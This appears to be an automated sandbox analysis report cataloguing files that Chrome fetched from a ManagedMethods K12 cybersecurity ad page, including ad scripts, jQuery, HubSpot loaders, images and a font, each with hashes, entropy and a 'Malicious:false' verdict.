                                                                                                                                                                                                                                                                                                                                                                          Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:PNG image data, 46 x 59, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):734
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.305981364516893
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:12:6v/7itOlpF9VDkf/ZfzGvrTTDAknPrGk5/G1gUseSPLz9FOkw+edc5AUBkt3YQmu:fODF3YQz7Ak5ef8jyPdlAOoniPH
                                                                                                                                                                                                                                                                                                                                                                          MD5:FB0234F3F5982BD6EE0A3DA1C40D487F
                                                                                                                                                                                                                                                                                                                                                                          SHA1:8C0FCCE46A26668E895ADE20A01FA979F3BBF60E
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:A293071DE0756FAAE6F10641A1B2F7FB71D13C5FEA2947B31895F5CEB87E0E91
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:CCE7E7147D0763E56FF3D2377F1ECB37121F26888DD8917643F5C76C1B1A0FAF519D640C99B76BAC58D0DB9FEBB6CC6DE739EA37C42EA2A776992997710E6FE3
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.......;.....3|H-....PLTE.../}..;p/}..;p/}..;p/}..;p/}.&p..;p/}..;p/}..W..;p/}./}..;p/}..;p/}..;p/}..;p/}..;p/}..;p/}..;p......................................}...p...c..V..p..I..`..<../}.Px.@l..d.0`. T..Gy.?w.;p.s..... tRNS... 00@@PPP``ppp...............5......IDATx....V.@...h.i...n2H.C....q.7..$.....#.......I.....EY\1i..I..........zF%wp.$N.V.d....F.C.L.Q..".I*.3..... .3.Tx.../..F..G;P.h.J..b.v..q..q...y6.B.G..=..g9..o#f.x}....\.P..D..AD{..Z.1.X..n...!. ..a..(_..*....k..J..!...c...4.:..B....5..6U.4..OOz..q...z...#..$.....:>.]}.@..M.w?...,..*f.."{~.eu.....f..~}.{s..{...<.....}..Noc^e8..m...W7!.u?N....d+...%8.N..p^S...Q...9..........v..+4.N.A\...O.p..n....1...SP.>....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.612457348662773
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:YTyLV/VfsqPNVcSLQzRE9Ldu1S4:YWLV9soDLQmpdwS4
                                                                                                                                                                                                                                                                                                                                                                          MD5:69EE36929D2172DEA5C1763BAC240040
                                                                                                                                                                                                                                                                                                                                                                          SHA1:77EF82FC4B7757D445E8901E16D785AA44E3B1DF
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:45DA241A91C843B268ADA7481CDECE1AA679F2720931EFFEA28D83E1398D66A9
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:FDA2E41AF332441315A0BC6352DD1B9350F92E13447CD1A58CBAA96748271C26780A653EA94F023808F572D1E329C855EF6A0E3B51558BF474ABA614AB26051A
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:{"version_hash":"8d515a58","url":"https://www.redditstatic.com/ads/8d515a58/pixel.js"}
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (4926), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):4926
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.815640786838441
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:96:1gWUfvlcY021mvn1blhad7OIJoodnbUp2dEjkRUK8Ko3Eu:1DY0hf1bT47OIqWb1j8Kzu
                                                                                                                                                                                                                                                                                                                                                                          MD5:18A38EA01C24EE41B857A11208B6942E
                                                                                                                                                                                                                                                                                                                                                                          SHA1:7299C2FE7ADC59017A6BC3E29FD8031A56059B20
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:4B10BEAC3804EB935963FFEDC5E5CF85871E9875755607422363684A8A62491D
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:FC5F50E93A8A2632E33ADD12D6C1DF3276467A9FC635BC4E08FDDCF89922AA254AC0A5D3BF72602B73B5183EA9117E22305C1792B90BCCC065369FCFA90BEBAE
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://googleads.g.doubleclick.net/pagead/viewthroughconversion/927141988/?random=1728897184780&cv=11&fst=1728897184780&bg=ffffff&guid=ON&async=1&gtm=45be4a90v873384026za200zb810608771&gcd=13r3r3r3r5l1&dma=0&tag_exp=101671035~101686685&u_w=1280&u_h=1024&url=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&ref=https%3A%2F%2Fgoogleads.g.doubleclick.net%2F&hn=www.googleadservices.com&frm=0&tiba=Automating%20Cybersecurity%20%26%20Student%20Safety%20with%20ManagedMethods&did=dZTQ1Zm&gdid=dZTQ1Zm&npa=0&pscdl=noapi&auid=199392175.1728897184&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=4
                                                                                                                                                                                                                                                                                                                                                                          Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (32769)
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):93868
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.372204012865564
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:k5RKUpVgklsdbuLP/l+0fGzA8gmtasgx/c9Rzzi4yff8qeLvHHEjam7rSnmBn9gn:Ee8FbGzA81+xRRi1Z3
                                                                                                                                                                                                                                                                                                                                                                          MD5:DDB84C1587287B2DF08966081EF063BF
                                                                                                                                                                                                                                                                                                                                                                          SHA1:9EB9AC595E9B5544E2DC79FFF7CD2D0B4B5EF71F
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:88171413FC76DDA23AB32BAA17B11E4FFF89141C633ECE737852445F1BA6C1BD
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:0640605A22F437F10521B2D96064E06E4B0A1B96D2E8FB709D6BD593781C72FF8A86D2BFE3090BC4244687E91E94A897C7B132E237D369B2E0DC01083C2EC434
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:/*! jQuery v1.7.1 jquery.com | jquery.org/license */.(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f("<"+a+">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){cl||(cl=c.createElement("iframe"),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if(!cm||!cl.createElement)cm=(cl.contentWindow||cl.contentDocument).document,cm.write((c.compatMode==="CSS1Compat"?"<!doctype html>":"")+"<html><body>"),cm.close();d=cm.createElement(a),cm.body.appendChild(d),e=f.css(d,"display"),b.removeChild(cl)}ck[a]=e}return ck[a]}function cu(a,b){var c={};f.each(cq.concat.apply([],cq.slice(0,b)),function(){c[this]=a});return c}function ct(){cr=b}function cs(){setTimeout(ct,0);return cr=f.now()}function cj(){try{return new a.ActiveXObject("Microsoft.XMLHTTP")}catch(b){}}function ci(){try{return new a.XMLHttpRequest}catch(b){}}function cc(a,c){a.dataFilter&&(c=a.dataFilter(c,a.dataType));var d=
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1055)
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):2690
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.39866636776827
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:48:Otg7xBqHIN7QaE9Fa9FZpPiNmgrZyHicju8m5I0zRHkFRCmTx:fN7Qabhiwdicju8WhRHMnTx
                                                                                                                                                                                                                                                                                                                                                                          MD5:76A4D84DE75340D59CA06503A14184D4
                                                                                                                                                                                                                                                                                                                                                                          SHA1:2FE3C4A95AF88BE57D1912BB09DC463F69924402
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:66E9BF446316F6EEC5EAEFA7098592BBD2144A60EB38C481DB233A6CA8B8D94A
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:2ABE6C816B265B72A8023E8F832B9BED0FFD2C931BA07C5DA1AE0CB5D60178CBD1CEA9CE6AE0BB88F77614954C20836342AD6BAFE25EB1CA4D2AEB495E4E2BD2
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:(function(){'use strict';function f(a,b,e){a.addEventListener&&a.addEventListener(b,e,!1)};/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .function g(a,b,e){if(Array.isArray(b))for(var c=0;c<b.length;c++)g(a,String(b[c]),e);else b!=null&&e.push(a+(b===""?"":"="+encodeURIComponent(String(b))))};function l(a=document){return a.createElement("img")};function m(a,b,e=null,c=!1){n(a,b,e,c)}function n(a,b,e,c){a.google_image_requests||(a.google_image_requests=[]);const d=l(a.document);if(e||c){const k=h=>{e&&e(h);if(c){h=a.google_image_requests;const v=Array.prototype.indexOf.call(h,d,void 0);v>=0&&Array.prototype.splice.call(h,v,1)}d.removeEventListener&&d.removeEventListener("load",k,!1);d.removeEventListener&&d.removeEventListener("error",k,!1)};f(d,"load",k);f(d,"error",k)}d.src=b;a.google_image_requests.push(d)};function p(a=null){return a&&a.getAttribute("data-jc")==="22"?a:document.querySelector('[data-jc="22"]')};var q=document,r=window;functi
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (3389), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):3389
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.1514871349348885
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:48:Sudkpwer6dkpw99pcd9Ywmpk0rkpwUMm5rOkpwR/hIbphkkpwBBrYkpwXMm5I:J+en+eNcdBIaeh+eR5SpDeB7e8f
                                                                                                                                                                                                                                                                                                                                                                          MD5:2CF240E4E781BA03E14A191BBE5FBF6B
                                                                                                                                                                                                                                                                                                                                                                          SHA1:492E7643FB8A069EB28463EAB2DF1EEC7984CDBA
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:F5DEE65819F5BEA056EFE6C9819E146E15648ED6770248D07FEDCFF4272CA394
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:C30F41E7ABC7D3B2346743E2542F5FDDBA79DD63934FC4736D43B596C5FA24DB0B41BC881C9774D0A2FE10344BABE6E1FCC174A816BB9AD43E2E9D4ACD38A5D3
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:!function(t,e,r){if(!document.getElementById(t)){var n=document.createElement("script");for(var a in n.src="https://js.hubspot.com/web-interactives-embed.js",n.type="text/javascript",n.id=t,r)r.hasOwnProperty(a)&&n.setAttribute(a,r[a]);var i=document.getElementsByTagName("script")[0];i.parentNode.insertBefore(n,i)}}("hubspot-web-interactives-loader",0,{"crossorigin":"anonymous","data-loader":"hs-scriptloader","data-hsjs-portal":6834707,"data-hsjs-env":"prod","data-hsjs-hublet":"na1"});!function(t,e,r){if(!document.getElementById(t)){var n=document.createElement("script");for(var a in n.src="https://js.usemessages.com/conversations-embed.js",n.type="text/javascript",n.id=t,r)r.hasOwnProperty(a)&&n.setAttribute(a,r[a]);var i=document.getElementsByTagName("script")[0];i.parentNode.insertBefore(n,i)}}("hubspot-messages-loader",0,{"data-loader":"hs-scriptloader","data-hsjs-portal":6834707,"data-hsjs-env":"prod","data-hsjs-hublet":"na1"});!function(e,t){if(!document.getElementById(e)){var c=
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (786)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):1672
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.286735414643417
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:48:bFj15yMuJcZ2E9uIic2u8aYlPFs3l7Q2xtHS:Fey2EYIic2u8bl9sJu
                                                                                                                                                                                                                                                                                                                                                                          MD5:AB304529064B2C30C88FC41AD81913E0
                                                                                                                                                                                                                                                                                                                                                                          SHA1:14091E21A049D97B052DD56FF4076898F6F7D0CC
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:88C5A7E6C9B3319F4BE9CD873D1E19766A62BE628EA9921156DD2702F1D15031
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:6F8A7C3D2516C88E172D6AF1F88B0F32242A737BA128F95E0668D57EE004384DAFE4011A84FC543BA477A7BC82A8D47862F1F276F0C89FA0087D63E4D3B72691
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://tpc.googlesyndication.com/pagead/js/r20241009/r20110914/client/load_preloaded_resource_fy2021.js
                                                                                                                                                                                                                                                                                                                                                                          Preview:(function(){'use strict';let e=[];const f=()=>{const a=e;e=[];for(const b of a)try{b()}catch{}};function g(a=document){return a.createElement("img")};function h(a=null){return a&&a.getAttribute("data-jc")==="26"?a:document.querySelector('[data-jc="26"]')};var k=document;/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .var m=()=>{var a=k.querySelectorAll("link[data-reload-stylesheet][as=style][rel=preload]");for(var b=0;b<a.length;b++){var c=a[b],d="link",l=document;d=String(d);l.contentType==="application/xhtml+xml"&&(d=d.toLowerCase());d=l.createElement(d);d.setAttribute("rel","stylesheet");d.setAttribute("href",c.getAttribute("href"));k.head.appendChild(d)}if(a.length>0&&!(Math.random()>.01)){a=(a=h(document.currentScript))&&a.getAttribute("data-jc-rcd")==="true"?"pagead2.googlesyndication-cn.com":"pagead2.googlesyndication.com"; .b=(b=h(document.currentScript))&&b.getAttribute("data-jc-version")||"unknown";a=`https://${a}/pagead/gen_204?id=jca
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                          MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                          SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://pd.sharethis.com/pd/dtscout?_t_=px&url=https%3A%2F%2Fald.my.id%2F&event_source=dtscout&rnd=0.9666548919402609&exptid=ZHoAA2cM4IQAAAAICdw7Aw%3D%3D&fcmp=false
                                                                                                                                                                                                                                                                                                                                                                          Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 48236, version 1.0
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):48236
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.994912604882335
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:768:uj6JxavgLx5rjTH3CdZ3y11o4uMb2IVEhiB6z6GAAHJApICtBgso6HaOjTXHRWK:ujoa4LxZPCdm3B2IVEhiB62apApISxos
                                                                                                                                                                                                                                                                                                                                                                          MD5:015C126A3520C9A8F6A27979D0266E96
                                                                                                                                                                                                                                                                                                                                                                          SHA1:2ACF956561D44434A6D84204670CF849D3215D5F
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:3C4D6A1421C7DDB7E404521FE8C4CD5BE5AF446D7689CD880BE26612EAAD3CFA
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:02A20F2788BB1C3B2C7D3142C664CDEC306B6BA5366E57E33C008EDB3EB78638B98DC03CDF932A9DC440DED7827956F99117E7A3A4D55ACADD29B006032D9C5C
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTS-muw.woff2
                                                                                                                                                                                                                                                                                                                                                                          Preview:wOF2.......l......D...............................O..B..h?HVAR.x.`?STAT.$'...0+...|.../V........+..2.0..6.6.$..`. ..~......[B4q.....t..P.M_.z...1..R.S*...u.#..R....fR.1.N.v.N.P...;.2........!Z......Qs...5f.G.K.an2&....2...*......C.H.t..N!.....nh.<(.vN.....j.._.L.P.t..Ai.%.............._I.i,..o,C.].H.X9.....a.=N....k.....n.L..k.f.u..{...:.}^\[..~5...Z`...........`!...%4..,...K0..&.a/....P....S....m.Z......u...D.j.F...f.0`I.`.`.h#..)(FQ.F!o$........S.).MV8%Rh...r...x...T]$.=......Y...!.3.&U..."....Q....{.l/0..d..4iJ/..}...3....i[Z..NG.WD...>.[U..Q.h..@m.=..S...1C2...d...<..v.?.q.f..n...OUz.....&Z......Z."..N.....n...9.B..C..W....}...W..6Zs.i.+Z........jB.n..x.8M.....q..@I....-.%..,C,..K..#.2...4)/.v_..x.<....t.....%[.4?.=j.V..jj''..W.u..q....I.L.=......E...\.M.7{.>......W........C.`...,9$......\..o........y...4A..m.P.,X..=?.:................wF`..+.P..........M!.4.......l.>M..t.ff5r..^..Z.g...!fA,hIIQ...e.R>B.AH.VuX..>..\.=.ky...1>C....>C.c.;...6D.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):495233
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.818838111426701
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:pTppKtJ61ubHWLXC8bCH2nqHAj/pOe4e8pU+xrueGd6BUeyiCb6D8x:BuCeH2nqHADpp4xO+IeGd6BUa+x
                                                                                                                                                                                                                                                                                                                                                                          MD5:53FA063FB1734CE6BB187C96E7665972
                                                                                                                                                                                                                                                                                                                                                                          SHA1:6C82DE36CB5AC4DA7DBCC104CF4F33D067D07C46
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:0200A7698AFAE38E9385F59706F2C5966FCD943AEC1B0D47597FB65F319FA2B0
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:6986E2E61C4264FE4C156ABFD1F6B665F53DCC6155EFE5F0D595D0E788116119E32C0A09D82558F4907729FDCDB8D8A31DD3CD3576B6460B13CBE634670AE5F9
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://get.managedmethods.com/_hcms/forms/v2.js
                                                                                                                                                                                                                                                                                                                                                                          Preview:!function(e){var t={};function n(r){if(t[r])return t[r].exports;var a=t[r]={i:r,l:!1,exports:{}};e[r].call(a.exports,a,a.exports,n);a.l=!0;return a.exports}n.m=e;n.c=t;n.d=function(e,t,r){n.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:r})};n.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"});Object.defineProperty(e,"__esModule",{value:!0})};n.t=function(e,t){1&t&&(e=n(e));if(8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var r=Object.create(null);n.r(r);Object.defineProperty(r,"default",{enumerable:!0,value:e});if(2&t&&"string"!=typeof e)for(var a in e)n.d(r,a,function(t){return e[t]}.bind(null,a));return r};n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};n.d(t,"a",t);return t};n.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)};n.p="//static.hsappstatic.net/forms-embed/static-1.6227/";n(n.s="bxrb")}({"+1EL":function(e,t,n){"use stri
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (4955), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):4955
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.821863906102895
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:96:1gWUfvlcY021mvn1blhad7OIJoodnbUp2dEjkRUD8KF/LNya:1DY0hf1bT47OIqWb1m8KlEa
                                                                                                                                                                                                                                                                                                                                                                          MD5:233518D913954AF2DFA472FE00658258
                                                                                                                                                                                                                                                                                                                                                                          SHA1:DCCE28E576036269763829338C69C964483C9949
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:F05C5E4CFCFCA8445A218BCEC2E15A2C6E1200E6286C006E72BA8635AC248BBF
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:06A6FE44EB5C6B94870AB2F164B89950D623AC0F8B927F016FFBD173761C233F6FF51E6D8B4456760F8C41EB5D196C633B6BB79637A97C0344F45711AEA5061B
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:PNG image data, 150 x 51, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):5064
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.933388463075541
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:96:vWEBRyKg4avHH1SxN3TVfdOPr9LIHHMZU1qcyg/BB2r1:vWEBQKgT4xN3TVfdOxL+HM7cyg/2r1
                                                                                                                                                                                                                                                                                                                                                                          MD5:7AF1F91AF04E6D39DB5C82ED35141D76
                                                                                                                                                                                                                                                                                                                                                                          SHA1:026D0907C25751519AB1DC714635AA60A62AD1CC
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:3DB89991B7E080EBF32366B653FBE544B6269695D6858E893C781861BD46B8A6
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:7FB204CFB9D448C5CE5E345D9E85B6BA2C4D538E604F5D2DE548818DFD098A3C76F2975C9F437473F635DA8E7A3906E814F8DAF847732C31711D2755E84A744A
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
